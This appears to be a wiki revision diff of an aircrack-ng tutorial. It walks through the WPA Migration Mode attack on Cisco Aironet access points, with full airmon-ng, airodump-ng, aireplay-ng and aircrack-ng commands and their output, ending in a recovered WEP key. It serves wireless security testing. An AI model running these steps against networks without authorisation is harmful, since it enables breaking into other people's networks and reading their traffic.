User Tools

Site Tools


wpa_migration_mode

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision
Previous revision
Last revisionBoth sides next revision
wpa_migration_mode [2010/08/11 17:21] lmeinerswpa_migration_mode [2010/08/29 19:43] – Fixed channel/frequency graph link mister_x
Line 21: Line 21:
 First, this solution assumes:  First, this solution assumes: 
  
- * You are using drivers patched for injection. Use the injection test to confirm your card can inject prior to proceeding. +  * You are using drivers patched for injection. Use the injection test to confirm your card can inject prior to proceeding. 
- * You are physically close enough to send and receive access point packets. Remember that just because you can receive packets from the access point does not mean you will be able to transmit packets to the AP. The wireless card strength is typically less then the AP strength. So you have to be physically close enough for your transmitted packets to reach and be received by the AP. You should confirm that you can communicate with the specific AP by following these instructions. +  * You are physically close enough to send and receive access point packets. Remember that just because you can receive packets from the access point does not mean you will be able to transmit packets to the AP. The wireless card strength is typically less then the AP strength. So you have to be physically close enough for your transmitted packets to reach and be received by the AP. You should confirm that you can communicate with the specific AP by following these instructions. 
- * You are using v1.2 of aircrack-ng, as this attack is only supported in this version and later.+  * You are using v1.2 of aircrack-ng, as this attack is only supported in this version and later.
  
 Ensure all of the above assumptions are true; otherwise the advice that follows will not work. In the examples below, you will need to change “wlan0” to the interface name which is specific to your wireless card. Ensure all of the above assumptions are true; otherwise the advice that follows will not work. In the examples below, you will need to change “wlan0” to the interface name which is specific to your wireless card.
Line 29: Line 29:
 ===== Equipment used ===== ===== Equipment used =====
  
-In this tutorial, here is what was used:  +In this tutorial, here is what was used:
- * MAC address of PC running aircrack-ng suite: 00:1f:3c:4e:88:46 +
- +
- * BSSID (MAC address of access point): 00:26:0B:2A:BA:40  +
- +
- * ESSID (Wireless network name): migrate +
- +
- * Access point channel: 8 +
- +
- * Wireless interface: wlan0+
  
 +  * MAC address of PC running aircrack-ng suite: 00:1f:3c:4e:88:46 
 +  * BSSID (MAC address of access point): 00:26:0B:2A:BA:40 
 +  * ESSID (Wireless network name): migrate 
 +  * Access point channel: 8 
 +  * Wireless interface: wlan0 
  
 You should gather the equivalent information for the network you will be working on. Then just change the values in the examples below to the specific network. You should gather the equivalent information for the network you will be working on. Then just change the values in the examples below to the specific network.
Line 51: Line 47:
  
 Here are the basic steps we will be going through:  Here are the basic steps we will be going through: 
- 1. Start the wireless interface in monitor mode on the specific AP channel +  - Start the wireless interface in monitor mode on the specific AP channel 
- 2. Start airodump-ng on AP channel with a BSSID filter to collect the new unique IVs +  Start airodump-ng on AP channel with a BSSID filter to collect the new unique IVs 
- 3. Use aireplay-ng to do a fake authentication with the access point +  Use aireplay-ng to do a fake authentication with the access point 
- 4. Start aireplay-ng in WPA Migration Mode attack mode to inject packets +  Start aireplay-ng in WPA Migration Mode attack mode to inject packets 
- 5. Run aircrack-ng to crack key using the IVs collected+  Run aircrack-ng to crack key using the IVs collected
  
 The following link points to a video of the attack: The following link points to a video of the attack:
 http://www.youtube.com/watch?v=Zq86oP-dxk4 http://www.youtube.com/watch?v=Zq86oP-dxk4
  
-=== Step 1 - Start the wireless interface in monitor mode on AP channel ===+==== Step 1 - Start the wireless interface in monitor mode on AP channel ====
  
 The purpose of this step is to put your card into what is called monitor mode. Monitor mode is mode whereby your card can listen to every packet in the air. Normally your card will only “hear” packets addressed to you. By hearing every packet, we can later select some for injection. As well, only (there are some rare exceptions) monitor mode allows you to inject packets.  The purpose of this step is to put your card into what is called monitor mode. Monitor mode is mode whereby your card can listen to every packet in the air. Normally your card will only “hear” packets addressed to you. By hearing every packet, we can later select some for injection. As well, only (there are some rare exceptions) monitor mode allows you to inject packets. 
  
-Enter the following command to start the wireless card on channel 8 in monitor mode: +Enter the following command to start the wireless card on channel 8 in monitor mode: 
 +<code>
 # airmon-ng start wlan0 8 # airmon-ng start wlan0 8
 +</code>
  
 Substitute the channel number that your AP runs on for “8” in the command above. This is important. You must have your wireless card locked to the AP channel for the following steps in this tutorial to work correctly.  Substitute the channel number that your AP runs on for “8” in the command above. This is important. You must have your wireless card locked to the AP channel for the following steps in this tutorial to work correctly. 
  
-The system will respond: +The system will respond: 
 +<code>
 Interface       Chipset         Driver Interface       Chipset         Driver
  
 wlan0           Intel 3945ABG   iwl3945 - [phy1] wlan0           Intel 3945ABG   iwl3945 - [phy1]
                                 (monitor mode enabled on mon0)                                 (monitor mode enabled on mon0)
 +</code>
  
 You will notice that “mon0” is reported above as being put into monitor mode.  You will notice that “mon0” is reported above as being put into monitor mode. 
  
 To confirm the interface is properly setup, enter “iwconfig”.  To confirm the interface is properly setup, enter “iwconfig”. 
 +<code>
 lo        no wireless extensions. lo        no wireless extensions.
  
Line 92: Line 92:
           Retry  long limit:  RTS thr:off   Fragment thr:off           Retry  long limit:  RTS thr:off   Fragment thr:off
           Power Management:off           Power Management:off
 +</code> 
  
 In the response above, you can see that mon0 is in monitor mode, on the 2.447GHz frequency which is channel 8 and the Access Point shows the MAC address of your wireless card. Please note that only the madwifi-ng drivers show the MAC address of your wireless card, the other drivers do not do this. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly.  In the response above, you can see that mon0 is in monitor mode, on the 2.447GHz frequency which is channel 8 and the Access Point shows the MAC address of your wireless card. Please note that only the madwifi-ng drivers show the MAC address of your wireless card, the other drivers do not do this. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly. 
  
-To match the frequency to the channel, check out: http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels then select the “Wifi Channel Selection and Channel Overlap” tab. This will give you the frequency for each channel.+To match the frequency to the channel, check out: http://www.cisco.com/en/US/docs/wireless/technology/channel/deployment/guide/Channel.html#wp134132 . This will give you the frequency for each channel.
  
-=== Step 2 - Start airodump-ng to capture the IVs ===+==== Step 2 - Start airodump-ng to capture the IVs ====
  
 The purpose of this step is to capture the IVs generated. This step starts airodump-ng to capture the IVs from the specific access point.  The purpose of this step is to capture the IVs generated. This step starts airodump-ng to capture the IVs from the specific access point. 
  
-Open another console session to capture the generated IVs. Then enter: +Open another console session to capture the generated IVs. Then enter: 
 +<code>
 # airodump-ng -c 8 --bssid 00:26:0B:2A:BA:40 -w output mon0 # airodump-ng -c 8 --bssid 00:26:0B:2A:BA:40 -w output mon0
 +</code>
  
 Where:  Where: 
--c 8 is the channel for the wireless network +  * -c 8 is the channel for the wireless network 
---bssid 00:26:0B:2A:BA:40 is the access point MAC address. This eliminates extraneous traffic. +  --bssid 00:26:0B:2A:BA:40 is the access point MAC address. This eliminates extraneous traffic. 
--w capture is file name prefix for the file which will contain the IVs. +  -w capture is file name prefix for the file which will contain the IVs. 
-Mon0 is the interface name.+  * mon0 is the interface name.
  
-While the injection is taking place (later), the screen will look similar to this: +While the injection is taking place (later), the screen will look similar to this: 
 +<code>
  CH  8 ][ Elapsed: 36 s ][ 2010-08-11 12:19  CH  8 ][ Elapsed: 36 s ][ 2010-08-11 12:19
  
Line 121: Line 125:
  00:26:0B:2A:BA:40  00:1F:3C:4E:88:46    0   24 - 1   28288  45891                                                                    00:26:0B:2A:BA:40  00:1F:3C:4E:88:46    0   24 - 1   28288  45891                                                                  
  00:26:0B:2A:BA:40  00:02:72:72:20:FE  -25    0 -54e    90   11263  00:26:0B:2A:BA:40  00:02:72:72:20:FE  -25    0 -54e    90   11263
 +</code>
 +
 +==== Step 3 - Use aireplay-ng to do a fake authentication with the access point ====
 +
 +In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “deauthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets. 
 +
 +The lack of association with the access point is the single biggest reason why injection fails. Remember the golden rule: The MAC you use for injection must be associated with the AP by either using fake authentication or using a MAC from an already-associated client. 
 +
 +To associate with an access point, use fake authentication: 
 +<code>
 +# aireplay-ng -1 0 -e migrate –a 00:26:0B:2A:BA:40  -h 00:1f:3c:4e:88:46 mon0
 +</code>
 +
 +Where: 
 +  * -1 means fake authentication
 +  * 0 reassociation timing in seconds
 +  * -e migrate is the wireless network name
 +  * -a 00:26:0B:2A:BA:40 is the access point MAC address
 +  * -h 00:1f:3c:4e:88:46 is our card MAC address
 +  * mon0 is the wireless interface name
 +
 +Success looks like:
 +<code>
 +12:27:40  Waiting for beacon frame (BSSID: 00:26:0B:2A:BA:40) on channel 8
 +
 +12:27:40  Sending Authentication Request (Open System) [ACK]
 +12:27:40  Authentication successful
 +12:27:40  Sending Association Request [ACK]
 +12:27:40  Association successful :-) (AID: 1)
 +</code>
 +
 +If you get a deauthentication packet, try again. Do not proceed to the next step until you have the fake authentication running correctly.
 +
 +==== Step 4 - Start aireplay-ng in WPA Migration Mode attack mode ====
 +
 +The purpose of this step is to start aireplay-ng in a mode which attacks Cisco Aironet access points configured in WPA Migration Mode. 
 +
 +The program listens for a WEP-encapsulated broadcast ARP packet, bitflips it to make it into an ARP coming from the attacker's MAC address and retransmits it to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV and also to forward the ARP reply to the attacker with a new IV. The program retransmits the same ARP packet over and over. However, each ARP packet repeated by the access point has a new IV as does the ARP reply forwarded to the attacker by the access point. 
 +It is all these new IVs which allow you to determine the WEP key. Again, this is our objective, to obtain a large number of IVs in a short period of time. 
 +
 +Open another console session and enter:
 +<code>
 +# aireplay-ng -8 -b 00:26:0B:2A:BA:40  -h 00:1f:3c:4e:88:46 mon0
 +</code>
 +
 +It will start listening for ARP requests and when it hears one, aireplay-ng will bitflip it and immediately start to inject it. 
 +
 +Here is what the screen looks like when ARP requests are being injected: 
 +<code>
 +12:17:52  Waiting for beacon frame (BSSID: 00:26:0B:2A:BA:40) on channel 8
 +Saving ARP requests in replay_arp-0811-121752.cap
 +You should also start airodump-ng to capture replies.
 +Remember to filter the capture to only keep WEP frames:  "tshark -R 'wlan.wep.iv' -r capture.cap -w outcapture.cap"
 +Read 318368 packets (102102 ARPs, 78 ACKs), sent 59315 packets...(500 pps)
 +</code>
 +
 +You can confirm that you are injecting by checking your airodump-ng screen. The data packets should be increasing rapidly. The ”#/s” should be a decent number. However, decent depends on a large variety of factors. A typical range is 300 to 400 data packets per second. It can as low as a 100/second and as high as a 500/second. 
 +
 +=== Troubleshooting Tips ===
 +  * If you receive a message similar to “Got a deauth/disassoc packet. Is the source mac associated?”, this means you have lost association with the AP. All your injected packets will be ignored. You must return to the fake authentication step (Step 3) and successfully associate with the AP.
 +
 +
 +==== Step 5 - Run aircrack-ng to obtain the WEP key ====
 +
 +The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps. 
 +
 +Start another console session and enter:
 +<code>
 +# aircrack-ng -a 1 -b 00:26:0B:2A:BA:40   output*.cap
 +</code>
 +
 +Where:
 +  * - a 1 forces aircrack-ng to detect the access point as a WEP access point.
 +  * -b 00:26:0B:2A:BA:40 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP.
 +  * output*.cap selects all files starting with “output” and ending in ”.cap”.
 +
 +Here is what success looks like:
 +<code>
 +                                                                                            Aircrack-ng 1.2
 +
 +
 +                                                                            [00:00:00] Tested 763 keys (got 47981 IVs)
  
 +   KB    depth   byte(vote)
 +    0    1/  3   EF(59904) F8(56320) 25(56064) 56(55552) D0(55552) 58(55296) 74(54528) FA(54528) 7D(54272) 86(53760) C7(53504) E7(53504) ED(53504) B0(53248) B9(53248) D7(53248)
 +    1    3/  5   99(56576) AA(56320) 6E(55552) 1A(55040) 25(55040) 3D(55040) 50(55040) 87(55040) 61(54784) 71(54784) D9(54528) 60(54272) BB(54272) F8(54272) 24(54016) E6(54016)
 +    2   20/  2   51(52992) 5F(52736) 7C(52736) 8F(52736) C5(52736) 23(52480) 76(52480) 77(52480) B5(52480) DD(52480) 47(52224) 5C(52224) 53(51968) D3(51968) DE(51968) 0B(51712)
 +    3    0/  1   B9(69120) 3B(57856) B0(57344) 53(55808) A2(55808) 96(55296) E4(55296) 5D(54784) D5(54784) 6E(54528) 38(54272) 65(54272) 4C(54016) 78(54016) F6(54016) 21(53760)
 +    4    7/  4   32(56576) 95(55808) 4D(54528) 82(54528) AE(54272) 0F(53760) 39(53760) B0(53760) F5(53760) 6E(53504) 97(53504) 11(53248) A1(53248) B3(53248) 5C(52992) 20(52736)
  
 +             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA ]
 +        Decrypted correctly: 100%
 +</code>
  
wpa_migration_mode.txt · Last modified: 2018/03/11 20:19 by mister_x